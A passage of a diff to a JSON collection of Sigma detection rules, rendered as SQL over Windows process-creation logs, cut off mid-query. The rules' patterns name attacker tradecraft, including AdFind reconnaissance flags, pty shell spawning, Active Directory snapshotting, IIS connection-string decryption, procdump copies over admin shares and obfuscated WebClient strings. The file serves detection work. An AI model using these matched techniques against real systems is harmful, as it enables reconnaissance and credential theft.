"proc_creation_win_teams_suspicious_command_line_cred_access.yml" }, { - "title": "PUA - AdFind Suspicious Execution", - "id": "9a132afa-654e-11eb-ae93-0242ac130002", - "status": "test", - "description": "Detects AdFind execution with common flags seen used during attacks", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", + "title": "Potential Recon Activity Using DriverQuery.EXE", + "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", + "status": "experimental", + "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.discovery" ], "falsepositives": [ - "Legitimate admin activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_pua_adfind_susp_usage.yml" - }, - { - "title": "Microsoft Workflow Compiler Execution", - "id": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d", - "status": "test", - "description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.", - "author": "Nik Seetharaman, frack113", - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1127", - "attack.t1218" - ], - "falsepositives": [ - "Legitimate MWC use (unlikely in modern enterprise environments)" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR OriginalFileName = 'Microsoft.Workflow.Compiler.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_workflow_compiler.yml" + "filename": "proc_creation_win_driverquery_recon.yml" }, { - "title": "Potential System Information Discovery Via Wmic.EXE", - "id": "9d5a1274-922a-49d0-87f3-8c653483b909", + "title": "Potential Exploitation Attempt From Office Application", + "id": "868955d9-697e-45d4-a3da-360cefd7c216", "status": "experimental", - "description": "Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,\nincluding OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,\nand GPU driver products/versions.\nSome of these commands were used by Aurora Stealer in late 2022/early 2023.\n", - "author": "TropChaud", + "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", + "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", "tags": [ - "attack.discovery", - "attack.t1082" + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'WMI Commandline Utility' OR OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '%cpu get name%' ESCAPE '\\' OR CommandLine LIKE '%MEMPHYSICAL get MaxCapacity%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get product%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get version%' ESCAPE '\\' OR CommandLine LIKE '%bios get SMBIOSBIOSVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get name%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get DriverVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get VideoModeDescription%' ESCAPE '\\' OR CommandLine LIKE '%OS get Caption,OSArchitecture,Version%' ESCAPE '\\' OR CommandLine LIKE '%DISKDRIVE get Caption%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_recon_system_info_discovery.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" }, { - "title": "Winrar Execution in Non-Standard Folder", - "id": "4ede543c-e098-43d9-a28f-dd784a13132f", - "status": "test", - "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", - "author": "Florian Roth (Nextron Systems), Tigzy", + "title": "Powershell ChromeLoader Browser Hijacker", + "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", + "status": "experimental", + "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", + "author": "Aedan Russell, frack113 (sigma)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.t1176" ], "falsepositives": [ - "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((NewProcessName LIKE '%\\\\WinRAR%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrar_execution.yml" + "filename": "proc_creation_win_browsers_chrome_load_extension.yml" }, { - "title": "Python Spawning Pretty TTY on Windows", - "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", + "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", + "id": "ef61af62-bc74-4f58-b49b-626448227652", "status": "experimental", - "description": "Detects python spawning a pretty tty", - "author": "Nextron Systems", + "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%python.exe' ESCAPE '\\' OR NewProcessName LIKE '%python3.exe' ESCAPE '\\' OR NewProcessName LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_python_pty_spawn.yml" + "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" }, { - "title": "Finger.exe Suspicious Invocation", - "id": "af491bca-e752-4b44-9c86-df5680533dbc", + "title": "PUA - Advanced IP Scanner Execution", + "id": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", "status": "experimental", - "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", - "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", + "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", + "author": "Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.discovery", + "attack.t1046", + "attack.t1135" ], "falsepositives": [ - "Admin activity (unclear what they do nowadays with finger.exe)" + "Legitimate administrative use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'finger.exe' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\advanced\\_ip\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_ip\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced IP Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_finger_usage.yml" + "filename": "proc_creation_win_pua_advanced_ip_scanner.yml" }, { - "title": "Detected Windows Software Discovery", - "id": "e13f668e-7f95-443d-98d2-1816a7648a7b", + "title": "SQL Client Tools PowerShell Session Detection", + "id": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", "status": "test", - "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", - "author": "Nikita Nazarov, oscd.community", + "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "author": "Agro (@agro_sev) oscd.communitly", "tags": [ - "attack.discovery", - "attack.t1518" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Legitimate administration activities" + "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%query%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%svcversion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\sqltoolsps.exe' ESCAPE '\\') AND NOT (ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_software_discovery.yml" + "filename": "proc_creation_win_mssql_sqltoolsps_susp_execution.yml" }, { - "title": "Arbitrary Binary Execution Using GUP Utility", - "id": "d65aee4d-2292-4cea-b832-83accd6cfa43", + "title": "Use of VSIISExeLauncher.exe", + "id": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", "status": "experimental", - "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", + "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Other parent binaries using GUP not currently identified" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\gup.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Notepad++\\\\notepad++.exe%' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\Notepad++\\\\updater\\\\%' ESCAPE '\\') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\VSIISExeLauncher.exe' ESCAPE '\\' OR OriginalFileName = 'VSIISExeLauncher.exe') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_gup_arbitrary_binary_execution.yml" + "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA", - "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", - "status": "test", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "title": "Suspicious Windows Update Agent Empty Cmdline", + "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", + "status": "experimental", + "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" }, { - "title": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code", - "id": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", + "title": "Potential Suspicious Mofcomp Execution", + "id": "1dd05363-104e-4b4a-b963-196a534b03a1", "status": "experimental", - "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", - "author": "frack113", + "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1216" + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\SyncAppvPublishingServer.vbs%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mofcomp.exe' ESCAPE '\\' OR OriginalFileName = 'mofcomp.exe') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" + "filename": "proc_creation_win_mofcomp_execution.yml" }, { - "title": "Sysinternals PsService Execution", - "id": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", - "status": "experimental", - "description": "Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Malicious PE Execution by Microsoft Visual Studio Debugger", + "id": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", + "status": "test", + "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", + "author": "Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community", "tags": [ - "attack.discovery", - "attack.persistence", - "attack.t1543.003" + "attack.t1218", + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use of PsService by an administrator" + "The process spawned by vsjitdebugger.exe is uncommon." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'psservice.exe' OR (NewProcessName LIKE '%\\\\PsService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\vsjitdebugger.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\vsimmersiveactivatehelper%.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\devenv.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_psservice.yml" + "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" }, { - "title": "Defrag Deactivation", - "id": "958d81aa-8566-4cea-a565-59ccd4df27b0", + "title": "Audio Capture via SoundRecorder", + "id": "83865853-59aa-449e-9600-74b9d89a6d6e", "status": "test", - "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", - "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", + "description": "Detect attacker collecting audio via SoundRecorder application.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.persistence", - "attack.t1053.005", - "attack.s0111" + "attack.collection", + "attack.t1123" ], "falsepositives": [ - "Unknown" + "Legitimate audio capture by legitimate user." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '%/delete%' ESCAPE '\\' OR CommandLine LIKE '%/change%' ESCAPE '\\') AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\SoundRecorder.exe' ESCAPE '\\' AND CommandLine LIKE '%/FILE%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_slingshot.yml" + "filename": "proc_creation_win_soundrecorder_audio_capture.yml" }, { - "title": "Microsoft IIS Connection Strings Decryption", - "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", - "status": "experimental", - "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", - "author": "Tim Rauch", + "title": "Imports Registry Key From a File", + "id": "73bba97f-a82d-42ce-b315-9182e76c57b1", + "status": "test", + "description": "Detects the import of the specified file to the registry with regedit.exe.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate import of keys", + "Evernote" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')) AND (CommandLine REGEXP ':[^ \\\\]')))" ], - "filename": "proc_creation_win_iis_connection_strings_decryption.yml" + "filename": "proc_creation_win_regedit_import_keys.yml" }, { - "title": "APT31 Judgement Panda Activity", - "id": "03e2746e-2b31-42f1-ab7a-eb39365b2422", - "status": "test", - "description": "Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report", + "title": "Potential CVE-2022-26809 Exploitation Attempt", + "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", + "status": "experimental", + "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.credential_access", - "attack.g0128", - "attack.t1003.001", - "attack.t1560.001" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown", + "Some cases in which the service spawned a werfault.exe process" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ldifde%' ESCAPE '\\' AND CommandLine LIKE '%-f -n%' ESCAPE '\\' AND CommandLine LIKE '%eprod.ldf%' ESCAPE '\\') OR (CommandLine LIKE '%copy \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%c$%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\aaaa\\\\procdump64.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\netsess.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\7za.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\aaaa\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_apt31_judgement_panda.yml" + "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" }, { - "title": "CMSTP Execution Process Creation", - "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Net WebClient Casing Anomalies", + "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", + "status": "experimental", + "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE 